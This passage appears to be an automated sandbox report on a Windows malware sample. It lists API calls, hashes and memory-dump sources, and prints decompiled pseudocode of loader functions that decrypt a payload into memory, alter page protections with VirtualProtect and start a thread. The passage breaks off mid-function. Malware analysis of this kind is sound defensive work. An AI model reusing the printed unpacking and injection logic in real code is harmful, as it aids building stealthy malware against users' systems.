                          • Instruction ID: 4ef8ea0f25f0d21801f3aadcae41890f20298be410270ac83ce4308e44535eca
                          • Opcode Fuzzy Hash: 91492e52fefef984ff8b7297fd5d48531a829797469a2d41c019ae219d59995a
                          • Instruction Fuzzy Hash: 6C414279D00609AFCF00EFE8D8859EEBBB5FB1A310F104526F911B7251D7349944CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • memcpy.NTDLL(00000000,?,?,?), ref: 001A1C56
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 001A1C73
                          • memcpy.NTDLL(00000000,?,?), ref: 001A1CB7
                            • Part of subcall function 001A6334: WaitForSingleObject.KERNEL32(00000000,00000006), ref: 001A6359
                          • CloseHandle.KERNELBASE(00000000), ref: 001A1C8E
                            • Part of subcall function 001A5F31: HeapFree.KERNEL32(00000000,?,001A110F), ref: 001A5F3D
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Heapmemcpy$AllocateCloseCreateEventFreeHandleObjectSingleWait
                          • String ID: W
                          • API String ID: 3157753570-655174618
                          • Opcode ID: 695d75666eabc462bbffa820b083f410649d9ef60a275926e8c1b2eb8b688898
                          • Instruction ID: d69c973d854913c9bb8e265009c3d386bcad0805149baa31cd8c5f20cb480693
                          • Opcode Fuzzy Hash: 695d75666eabc462bbffa820b083f410649d9ef60a275926e8c1b2eb8b688898
                          • Instruction Fuzzy Hash: C431EE7A941318BBCB119F64CC89BAE3BB9FF42354F244524FC14AB206D3B18E509B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E10001000(unsigned int __eax, void* __ecx, void* _a4, intOrPtr _a8, signed int _a12) {
                          				signed int _v8;
                          				int _v12;
                          				unsigned int _t48;
                          				void* _t57;
                          				void* _t64;
                          				void* _t69;
                          
                          				_t48 = __eax;
                          				_v8 = 0x57;
                          				_v12 = __eax + 0x00000fff & 0xfffff000;
                          				_t57 = E10001A7D(__eax + 0x00000fff & 0xfffff000);
                          				if(_t57 == 0) {
                          					_v8 = 8;
                          				} else {
                          					memcpy(_t57, _a4, _a12 + 0x22);
                          					E10001BFE(_a12 + 0x22, _t57, _a8);
                          					_t64 = CreateEventA(0, 1, 0, 0);
                          					if(_t64 != 0) {
                          						_a12 = E100015C7(_t57 + _a12, _t64);
                          						CloseHandle(_t64); // executed
                          					}
                          					if(_a12 != 0xaefa8c44) {
                          						E10001BE9(_t57);
                          					} else {
                          						asm("sbb esi, esi");
                          						_t69 =  ~( ~(_t48 & 0x00000fff)) + (_t48 >> 0xc);
                          						memcpy(_t57, _a4, _v12);
                          						_a12 = _a12 & 0x00000000;
                          						if(_t69 > 0) {
                          							_v8 = _t57;
                          							do {
                          								asm("ror eax, cl");
                          								E10001BFE(0x1000, _v8, _a8);
                          								_a12 = _a12 + 1;
                          								_v8 = _v8 + 0x1000;
                          							} while (_a12 < _t69);
                          						}
                          						_v8 = _v8 & 0x00000000;
                          						 *0x10005000 = 0xaefa8c44;
                          						 *0x10004034 = _t57 - _a4;
                          					}
                          				}
                          				return _v8;
                          			}









                          0x10001006
                          0x10001016
                          0x1000101d
                          0x10001025
                          0x10001029
                          0x100010f0
                          0x1000102f
                          0x1000103a
                          0x10001049
                          0x1000105b
                          0x1000105f
                          0x1000106d
                          0x10001070
                          0x10001070
                          0x1000107d
                          0x100010e9
                          0x1000107f
                          0x1000108f
                          0x10001097
                          0x10001099
                          0x1000109e
                          0x100010a7
                          0x100010a9
                          0x100010b1
                          0x100010ba
                          0x100010bf
                          0x100010c4
                          0x100010c7
                          0x100010ca
                          0x100010b1
                          0x100010d2
                          0x100010d6
                          0x100010e0
                          0x100010e0
                          0x1000107d
                          0x100010fe

                          APIs
                            • Part of subcall function 10001A7D: HeapAlloc.KERNEL32(00000000,?,100017F7,840FC086,?,?,AEFA8C44), ref: 10001A89
                          • memcpy.NTDLL(00000000,?,?,?,?,?,?,?,?,?,10001F4B,?,?,10005004,?,?), ref: 1000103A
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 10001055
                          • memcpy.NTDLL(00000000,?,?), ref: 10001099
                            • Part of subcall function 100015C7: WaitForSingleObject.KERNEL32(00000000,00000006,00000000,00000000,?,1000106C,00000000), ref: 100015EC
                          • CloseHandle.KERNELBASE(00000000), ref: 10001070
                            • Part of subcall function 10001BE9: HeapFree.KERNEL32(00000000,?,1000181B), ref: 10001BF5
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424126405.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.2424134637.0000000010005000.00000040.00020000.sdmp Download File
                          Similarity
                          • API ID: Heapmemcpy$AllocCloseCreateEventFreeHandleObjectSingleWait
                          • String ID: W
                          • API String ID: 905428733-655174618
                          • Opcode ID: 0091e5ff0e402ac96eed774528414b6299b913407cab4b70dcd069d0636b99c1
                          • Instruction ID: b8556dd7d2a9a3215b259bc18b0d5fecc3a51e11695d8264b34c933edbc8727c
                          • Opcode Fuzzy Hash: 0091e5ff0e402ac96eed774528414b6299b913407cab4b70dcd069d0636b99c1
                          • Instruction Fuzzy Hash: C331B175901359ABEB11CF54CC85AEF3BA8EF44384F114129FD50AB209D7B1DE509B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLastError.KERNEL32(?,00000000), ref: 001A544F
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • wsprintfW.USER32 ref: 001A53C4
                          • memcpy.NTDLL(00000000,?,?,?,00000000,00000000,?,?,?,?,00000000), ref: 001A53FD
                          • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00000000,?,00000000), ref: 001A5436
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: ErrorLast$AllocateHeapmemcpywsprintf
                          • String ID:
                          • API String ID: 1949449657-0
                          • Opcode ID: 4effc4c9c2527233069c93695f72c69b951d0ef2ea7a6412927d3d0b87be8a8a
                          • Instruction ID: e71fc458f7da07d0a369a71921170528c0bfcc8da65e175ddb995eaa5ac8311d
                          • Opcode Fuzzy Hash: 4effc4c9c2527233069c93695f72c69b951d0ef2ea7a6412927d3d0b87be8a8a
                          • Instruction Fuzzy Hash: 5F417B79904619BFDB14ABA4CC41EAE77ADAF0A391F450061F901DB262E730DE81C7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • memset.NTDLL ref: 001A7FE4
                          • RtlInitializeCriticalSection.NTDLL(001AE208), ref: 001A7FF5
                          • GetCurrentProcessId.KERNEL32(?,?,?,00000110,?,?,?,?,?,?,?,001A1767), ref: 001A8064
                          • OpenProcess.KERNEL32(?,00000000,00000000,?,?,?,00000110,?,?,?,?,?,?,?,001A1767), ref: 001A807B
                          • GetSystemTimeAsFileTime.KERNEL32(001AE1E8,?,?,001AE1BC,?,?,?,?,00000110), ref: 001A8117
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: ProcessTime$AllocateCriticalCurrentFileHeapInitializeOpenSectionSystemmemset
                          • String ID:
                          • API String ID: 2762430367-0
                          • Opcode ID: 3ca62847636f266b39be40ad6a70296896a80cf39f94b920b3aabc6ef42fe3d1
                          • Instruction ID: a2ed745cd10ac97dbbf214308bf9dc04beb0e68a65ae58ddc074b8f546f45c47
                          • Opcode Fuzzy Hash: 3ca62847636f266b39be40ad6a70296896a80cf39f94b920b3aabc6ef42fe3d1
                          • Instruction Fuzzy Hash: 91517F74A002059FC708DFA4DD54E9D7BB9FF4A310F1944AAE805DB762EB359886CB11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001AA54F: CoInitializeEx.OLE32(00000000,00000002), ref: 001AA555
                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 001A6391
                          • GetLastError.KERNEL32 ref: 001A6485
                            • Part of subcall function 001AAEF6: GetSystemTimeAsFileTime.KERNEL32(00000001,00000001), ref: 001AAF00
                            • Part of subcall function 001AAEF6: SetWaitableTimer.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 001AAF1E
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001A63DA
                          • CloseHandle.KERNEL32(?), ref: 001A647D
                            • Part of subcall function 001A61D2: CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001A61E1
                          • GetLastError.KERNEL32(?), ref: 001A6498
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: CreateErrorLastTimeTimerWaitable$CloseFileGlobalHandleInitializeMultipleObjectsStreamSystemWait
                          • String ID:
                          • API String ID: 2396954431-0
                          • Opcode ID: bfc725c3bf968139e7f588d3051cda7d144ab44f5dc2ecfd473455a01645a6b6
                          • Instruction ID: 22a5164ef67d5bdfada5325549a763aeeab42ae00df474d8202aa4aff8d89509
                          • Opcode Fuzzy Hash: bfc725c3bf968139e7f588d3051cda7d144ab44f5dc2ecfd473455a01645a6b6
                          • Instruction Fuzzy Hash: 8C31923A504310AFC721EF64DD45EABBBE8EB9A750F050A19F995E3161E730DC44CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ObjectStublessClient9.OLE32(?,00000000,?,00000000,?,001A7F3F,00000000,00000008), ref: 001A7CF2
                          • Sleep.KERNEL32(000001F4), ref: 001A7D0A
                          • lstrlenW.KERNEL32(?), ref: 001A7D40
                          • memcpy.NTDLL(00000000,?,?,?), ref: 001A7D61
                          • SysFreeString.OLEAUT32(?), ref: 001A7D75
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Client9FreeObjectSleepStringStublesslstrlenmemcpy
                          • String ID:
                          • API String ID: 2118715118-0
                          • Opcode ID: aac1cc13429029366e5267c598b8bc0ece7d80c8cb56e47751c9d5f43299fb7d
                          • Instruction ID: 057a50560cf40b21cb6cc6a70e225479eef343a8d30dc559d393881fbc320dfa
                          • Opcode Fuzzy Hash: aac1cc13429029366e5267c598b8bc0ece7d80c8cb56e47751c9d5f43299fb7d
                          • Instruction Fuzzy Hash: FF215C7990060AEFCB11DFE4D8849AEBBB8FF4A310B1045A9E845E7251E730DB41CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E10001FBE(void* __ecx, void* __edx, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
                          				long _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				void* _v20;
                          				signed int _v24;
                          				char _v28;
                          				void* __ebx;
                          				void* _t49;
                          				intOrPtr _t54;
                          				intOrPtr _t58;
                          				intOrPtr _t70;
                          				void* _t75;
                          				signed int _t76;
                          				long _t78;
                          				signed int _t87;
                          				intOrPtr _t89;
                          				void* _t91;
                          
                          				_v16 = _v16 & 0x00000000;
                          				_t87 =  *0x10005000; // 0xaefa8c44
                          				_v12 = _t87;
                          				if(E1000196C(__ecx,  &_v20,  &_v28, _t87 ^ 0x6bcf54fb) == 0) {
                          					_v8 = 0x7e;
                          					L19:
                          					return _v8;
                          				}
                          				_t91 = _v20;
                          				_t7 = _t91 + 0x10; // 0x50fc458d
                          				_t8 = _t87 + 0x510573c0; // 0x100000004
                          				_t78 = _t8;
                          				_v24 = _t78;
                          				_t10 = _t87 + 0x510583bc; // 0x100001000
                          				_t49 = VirtualAlloc(0,  *_t7, _t10, _t78); // executed
                          				_t75 = _t49;
                          				_v20 = _t75;
                          				if(_t75 != 0) {
                          					E10001DDF(_t91, _t75);
                          					_t13 = _t91 + 0x5c; // 0x6a03eb08
                          					_t14 = _t91 + 0x58; // 0x56fffc75
                          					E10001AD5( *_t14,  *_t13 + _t91, _t75);
                          					_t15 = _t91 + 0x20; // 0x875c085
                          					_t16 = _t91 + 0x10; // 0x50fc458d
                          					_push( *_t16);
                          					_t17 = _t91 + 0x1c; // 0xc56ff08
                          					_t54 = E10001601( *_t17, _t75,  *_t15 + _t91);
                          					_v8 = _t54;
                          					if(_t54 != 0) {
                          						L15:
                          						if(_t75 != 0) {
                          							VirtualFree(_t75, 0, _t87 + 0x5105f3bc);
                          						}
                          						L17:
                          						E10001A92(_t91, _v28);
                          						goto L19;
                          					}
                          					_t58 = E10001256(_t91, _t75); // executed
                          					_v8 = _t58;
                          					if(_t58 != 0) {
                          						goto L15;
                          					}
                          					_t20 = _t91 + 0x64; // 0x30c015
                          					_push(0);
                          					_push(1);
                          					_push(_t75);
                          					if( *((intOrPtr*)( *_t20 + _t75))() != 0) {
                          						_t89 =  *0x100030c4(_v24 << 2);
                          						if(_t89 != 0) {
                          							_t76 = 0;
                          							if(_v12 + 0x510573c0 == 0) {
                          								L13:
                          								_t75 = _v20;
                          								 *_a4 = _t89;
                          								_t87 = _v12;
                          								 *_a8 = _v16;
                          								L14:
                          								if(_v8 == 0) {
                          									goto L17;
                          								}
                          								goto L15;
                          							} else {
                          								goto L10;
                          							}
                          							do {
                          								L10:
                          								_t26 = _t76 + 1; // 0x1
                          								_t70 = E10001C97(_t91, _v20, _t26);
                          								 *((intOrPtr*)(_t89 + _t76 * 4)) = _t70;
                          								if(_t70 != 0) {
                          									_v16 = _v16 + 1;
                          								}
                          								_t76 = _t76 + 1;
                          							} while (_t76 < _v12 + 0x510573c0);
                          							goto L13;
                          						}
                          						_t87 = _v12;
                          						_v8 = 8;
                          						goto L15;
                          					}
                          					_v8 = 1;
                          					goto L15;
                          				}
                          				_v8 = GetLastError();
                          				goto L14;
                          			}




















                          0x10001fc4
                          0x10001fca
                          0x10001fe2
                          0x10001fec
                          0x1000210e
                          0x10002115
                          0x1000211b
                          0x1000211b
                          0x10001ff3
                          0x10001ff6
                          0x10001ff9
                          0x10001ff9
                          0x10002000
                          0x10002003
                          0x1000200d
                          0x10002013
                          0x10002015
                          0x1000201a
                          0x1000202b
                          0x10002030
                          0x10002033
                          0x10002039
                          0x1000203e
                          0x10002041
                          0x10002041
                          0x10002044
                          0x10002049
                          0x1000204e
                          0x10002053
                          0x100020ee
                          0x100020f0
                          0x100020fc
                          0x100020fc
                          0x10002102
                          0x10002106
                          0x00000000
                          0x1000210b
                          0x1000205c
                          0x10002061
                          0x10002066
                          0x00000000
                          0x00000000
                          0x1000206c
                          0x1000206f
                          0x10002071
                          0x10002075
                          0x1000207a
                          0x10002092
                          0x10002096
                          0x100020a7
                          0x100020ae
                          0x100020d5
                          0x100020db
                          0x100020de
                          0x100020e3
                          0x100020e6
                          0x100020e8
                          0x100020ec
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x100020b0
                          0x100020b0
                          0x100020b0
                          0x100020b9
                          0x100020be
                          0x100020c3
                          0x100020c5
                          0x100020c5
                          0x100020cb
                          0x100020d1
                          0x00000000
                          0x100020b0
                          0x10002098
                          0x1000209b
                          0x00000000
                          0x1000209b
                          0x1000207c
                          0x00000000
                          0x1000207c
                          0x10002022
                          0x00000000

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,50FC458D,0000000100001000,0000000100000004,?,100018FB,?,AEFA8C44,?,?,?,?,100018FB), ref: 1000200D
                          • GetLastError.KERNEL32(?,?,?,?,100018FB), ref: 1000201C
                          • VirtualFree.KERNEL32(00000000,00000000,5DF49888,50FC458D,00000000,00000000,?,?,?,?,100018FB), ref: 100020FC
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424126405.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.2424134637.0000000010005000.00000040.00020000.sdmp Download File
                          Similarity
                          • API ID: Virtual$AllocErrorFreeLast
                          • String ID: ~
                          • API String ID: 3335258512-1707062198
                          • Opcode ID: 9016362d77aa38e69de42aaf15a0960eac3063ef48b148217b4bed144ffc7af6
                          • Instruction ID: d269a92e7d16ef5b0a51c94e551a808d1a2717378d96e421042625a5292b2fc0
                          • Opcode Fuzzy Hash: 9016362d77aa38e69de42aaf15a0960eac3063ef48b148217b4bed144ffc7af6
                          • Instruction Fuzzy Hash: 7D414FB5A0070AABEB11DF98CC81A9EB7B9FF48390F118459E901E7345D774EA45CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001AAA9E: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001AAAAB
                            • Part of subcall function 001AAA9E: memset.NTDLL ref: 001AAABE
                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 001AA262
                          • CloseHandle.KERNEL32(00000005), ref: 001AA317
                            • Part of subcall function 001AAEF6: GetSystemTimeAsFileTime.KERNEL32(00000001,00000001), ref: 001AAF00
                            • Part of subcall function 001AAEF6: SetWaitableTimer.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 001AAF1E
                          • WaitForMultipleObjects.KERNEL32(00000002,00000005,00000000,000000FF), ref: 001AA304
                          • GetLastError.KERNEL32(?,001A6439,?,001AE090,00000005,00000000,?), ref: 001AA31F
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: TimeTimerWaitable$AllocateCloseCreateErrorFileHandleHeapLastMultipleObjectsSystemWaitmemset
                          • String ID:
                          • API String ID: 2990740588-0
                          • Opcode ID: d9a698f1208cd2d0405c10912019a794536efe535415c83371b7ec522096f62c
                          • Instruction ID: 18c8cde9e2287fba828ced2aee4d4a829efa6abcdb16af999c6bb74ac3a03505
                          • Opcode Fuzzy Hash: d9a698f1208cd2d0405c10912019a794536efe535415c83371b7ec522096f62c
                          • Instruction Fuzzy Hash: A431B279A00209AFCF15DF94DC85ABEB7B9FF9A310F61401AF912A7250DB309D51CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • HeapCreate.KERNELBASE(00000000,01000000,00000000), ref: 001A3127
                          • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000), ref: 001A313F
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001A314E
                          • CloseHandle.KERNEL32(?), ref: 001A319E
                            • Part of subcall function 001A1C1C: memcpy.NTDLL(00000000,?,?,?), ref: 001A1C56
                            • Part of subcall function 001A1C1C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 001A1C73
                            • Part of subcall function 001A1C1C: CloseHandle.KERNELBASE(00000000), ref: 001A1C8E
                            • Part of subcall function 001A1C1C: memcpy.NTDLL(00000000,?,?), ref: 001A1CB7
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Create$CloseEventHandlememcpy$HeapObjectSingleWait
                          • String ID:
                          • API String ID: 4023436124-0
                          • Opcode ID: d9779bae88edc6d658f169cb5ee8d5aa477f2723fce97f290838924a2e94c762
                          • Instruction ID: 7b2fe9d63436e4976a1ecf21e3eb590a300381a092c00941a3e80d8fd2b1e0b0
                          • Opcode Fuzzy Hash: d9779bae88edc6d658f169cb5ee8d5aa477f2723fce97f290838924a2e94c762
                          • Instruction Fuzzy Hash: BB11B23AA00614BBC7319F689D88F9F7BBCEB86750F040569F416E7611D730DA49C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A459C: RtlEnterCriticalSection.NTDLL(00000075), ref: 001A459D
                          • CloseHandle.KERNEL32(?), ref: 001A8B7E
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 001A8BBD
                          • GetLastError.KERNEL32(?,?,?,001A3966,?,70050D5A,001AF000,?,FB9061CB,001AF000,?,CB91F5CE,001AF000,?,E6D3DBC7,001AF000), ref: 001A8BD9
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 001A8BF6
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: CriticalSection$CloseCreateEnterErrorHandleLastLeaveTimerWaitable
                          • String ID:
                          • API String ID: 1254166204-0
                          • Opcode ID: 1fe9751c2a8f4528ed47125f82648677cb64596293007884d25aebaa11bdab27
                          • Instruction ID: 4ab68bd3eb61bdd918a8f45780ea87929e3fe4f63a57aff1a8d2d1add2eb2eb1
                          • Opcode Fuzzy Hash: 1fe9751c2a8f4528ed47125f82648677cb64596293007884d25aebaa11bdab27
                          • Instruction Fuzzy Hash: EB119EF4600706FFDB04AFA4DD85A9EBBA8FF1A300F104029F50AA7651DB70AE448B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E1000211E(void* __ebx, intOrPtr _a4) {
                          				void* __edi;
                          				void* __esi;
                          				void* _t2;
                          				void* _t8;
                          				long _t16;
                          				void* _t17;
                          
                          				_t16 = 0;
                          				_t2 = HeapCreate(0, 0x400000, 0); // executed
                          				 *0x10004030 = _t2;
                          				_t19 = _t2;
                          				if(_t2 == 0) {
                          					_t16 = GetLastError();
                          				} else {
                          					 *0x10004000 = __ebx;
                          					 *0x10004018 = E1000137F(_a4, 0, _t17, _t19);
                          					if(E10001CF3(__ebx, _t17, _t19) == 0) {
                          						_t16 = 0x7f;
                          					} else {
                          						asm("lock xadd [eax], ecx");
                          						_t8 = CreateThread(0, 0, E10001F09, __ebx, 0, 0x10004024); // executed
                          						 *0x10004020 = _t8;
                          						if(_t8 == 0) {
                          							_t16 = GetLastError();
                          							asm("lock xadd [esi], eax");
                          						}
                          					}
                          				}
                          				return _t16;
                          			}









                          0x10002120
                          0x10002129
                          0x1000212f
                          0x10002134
                          0x10002136
                          0x1000219e
                          0x10002138
                          0x1000213c
                          0x10002149
                          0x10002155
                          0x10002195
                          0x10002157
                          0x10002161
                          0x10002173
                          0x10002179
                          0x10002180
                          0x10002188
                          0x1000218d
                          0x1000218d
                          0x10002180
                          0x10002155
                          0x100021a4

                          APIs
                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,10001DB6,?,?,?,100017D2,?,?,?), ref: 10002129
                          • CreateThread.KERNELBASE(00000000,00000000,10001F09,?,00000000,10004024), ref: 10002173
                          • GetLastError.KERNEL32(?,00000001,10001DB6,?,?,?,100017D2,?,?,?), ref: 10002182
                          • GetLastError.KERNEL32(?,00000001,10001DB6,?,?,?,100017D2,?,?,?), ref: 10002198
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424126405.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.2424134637.0000000010005000.00000040.00020000.sdmp Download File
                          Similarity
                          • API ID: CreateErrorLast$HeapThread
                          • String ID:
                          • API String ID: 4176170028-0
                          • Opcode ID: e33b5df4361e4bed430b90843801152a2935f0a365ad1c7019cf4bc7c1f8ef4f
                          • Instruction ID: 5a8d10cbcca37fe772868a5224db5b1d10d752773b56b94d7c16d0426b18c072
                          • Opcode Fuzzy Hash: e33b5df4361e4bed430b90843801152a2935f0a365ad1c7019cf4bc7c1f8ef4f
                          • Instruction Fuzzy Hash: 0801A2746052106BF3219B359C8CB6B3BA9F7D97E1722043DFB15D2298DF3088018A68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A5F31: HeapFree.KERNEL32(00000000,?,001A110F), ref: 001A5F3D
                            • Part of subcall function 001A2101: StrToIntExA.SHLWAPI(00000000,00000000,001AF000), ref: 001A2119
                          • GetForegroundWindow.USER32 ref: 001A3AA3
                          • StrStrIA.SHLWAPI(00000000,?), ref: 001A3AF3
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: ForegroundFreeHeapWindow
                          • String ID: ~
                          • API String ID: 1509781277-1707062198
                          • Opcode ID: ac1f4fe99787ce6c5b34108c886a4533e2f809328722b519d4fd6c0133b1f166
                          • Instruction ID: 58815e6c335ccd9b6cd47fa3e76608b166a189bd5053837709640b8a95c22e4e
                          • Opcode Fuzzy Hash: ac1f4fe99787ce6c5b34108c886a4533e2f809328722b519d4fd6c0133b1f166
                          • Instruction Fuzzy Hash: F9816C79B0021ABBEF11DAA48D81BBEB7ACAF46354F140025F911E7291EB74DF01DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E10001A92(void* _a4, int _a8) {
                          				int _t3;
                          				int _t5;
                          				void* _t7;
                          
                          				_t3 = _a8;
                          				_t7 = _a4;
                          				if(_t3 != 0) {
                          					if(_t3 == 0xffffffff) {
                          						_t3 = lstrlenW(_t7) + _t6;
                          					}
                          				} else {
                          					_t3 = lstrlenA(_t7);
                          				}
                          				memset(_t7, 0, _t3);
                          				_t5 = HeapFree( *0x10004030, 0, _t7); // executed
                          				return _t5;
                          			}






                          0x10001a92
                          0x10001a97
                          0x10001a9d
                          0x10001aab
                          0x10001ab4
                          0x10001ab4
                          0x10001a9f
                          0x10001aa0
                          0x10001aa0
                          0x10001aba
                          0x10001acb
                          0x10001ad2

                          APIs
                          • lstrlenA.KERNEL32(?,100018FB,1000210B,100018FB,?,50FC458D,00000000,00000000,?,?,?,?,100018FB), ref: 10001AA0
                          • lstrlenW.KERNEL32(?,100018FB,1000210B,100018FB,?,50FC458D,00000000,00000000,?,?,?,?,100018FB), ref: 10001AAE
                          • memset.NTDLL ref: 10001ABA
                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 10001ACB
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424126405.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.2424134637.0000000010005000.00000040.00020000.sdmp Download File
                          Similarity
                          • API ID: lstrlen$FreeHeapmemset
                          • String ID:
                          • API String ID: 439345311-0
                          • Opcode ID: 146ade31143c0300de4c157206ed230fc505540dd8cb196e5e5a4d486747efa3
                          • Instruction ID: fc4ae9caac7ae343875d31f06f6b38ca7350805a18390455915b828602430713
                          • Opcode Fuzzy Hash: 146ade31143c0300de4c157206ed230fc505540dd8cb196e5e5a4d486747efa3
                          • Instruction Fuzzy Hash: D3E04F71607521BBF211DB24DC85FCF3BACEF027E1F154600F514E10A9D7245A408A9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CoCreateInstance.OLE32(?,00000000,00000001,0035DB68,00000000), ref: 001AAD6D
                          • CoCreateInstance.OLE32(?,00000000,00000001,0035DB48,?), ref: 001AADD0
                          • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001AAE07
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: CreateInstance$BlanketProxy
                          • String ID:
                          • API String ID: 3291578418-0
                          • Opcode ID: 9c68f9212e926544490de62493b40bb51e3311b6b170cf3e9cb2315b4b391f57
                          • Instruction ID: 9f2cfca328515bad162e2656a03f1896a86fb33365f9d9d45a4cf154c301f1ea
                          • Opcode Fuzzy Hash: 9c68f9212e926544490de62493b40bb51e3311b6b170cf3e9cb2315b4b391f57
                          • Instruction Fuzzy Hash: 8B314479A00204BFCB10DFE4D888E9AB7BDFF8A704B244599F506DB261D7719A45CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E10001256(void* __eax, void* _a4) {
                          				long _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				long _v20;
                          				signed int _v24;
                          				void* _t24;
                          				signed int _t27;
                          				signed int _t28;
                          				int _t30;
                          				signed int _t37;
                          				intOrPtr* _t45;
                          				signed int _t46;
                          				void* _t47;
                          
                          				_t24 = __eax;
                          				_v16 = _v16 & 0x00000000;
                          				_t3 = _t24 + 0x62; // 0xc015ff56
                          				_t46 =  *_t3 & 0x0000ffff;
                          				_t5 = _t24 + 0x14; // 0xff1075ff
                          				_t6 = _t24 + 0x68; // 0x10001963
                          				_t45 = _t6;
                          				_v24 = _t46;
                          				VirtualProtect(_a4,  *_t5, 4,  &_v20); // executed
                          				_v12 = _v12 & 0x00000000;
                          				if(_t46 <= 0) {
                          					L14:
                          					return _v16;
                          				}
                          				_t11 = _t45 + 0x10; // 0x10001973
                          				_t47 = _t11;
                          				while(_v16 == 0) {
                          					_t27 =  *0x10005000; // 0xaefa8c44
                          					asm("bt [esi], ecx");
                          					_t37 = _t27;
                          					if((_t27 ^ 0xaefa8c59) >= 0) {
                          						asm("bt [esi], ecx");
                          						if((_t37 ^ 0xaefa8c5a) >= 0) {
                          							L10:
                          							_t28 = _t27 ^ 0xaefa8c40;
                          							L11:
                          							_t13 = _t47 - 0xc; // 0x10c2c95f
                          							_v8 = _t28;
                          							_t30 = VirtualProtect( *_t45 + _a4,  *_t13, _v8,  &_v20); // executed
                          							if(_t30 == 0) {
                          								_v16 = GetLastError();
                          							}
                          							_t45 = _t45 + 0x14;
                          							_t47 = _t47 + 0x14;
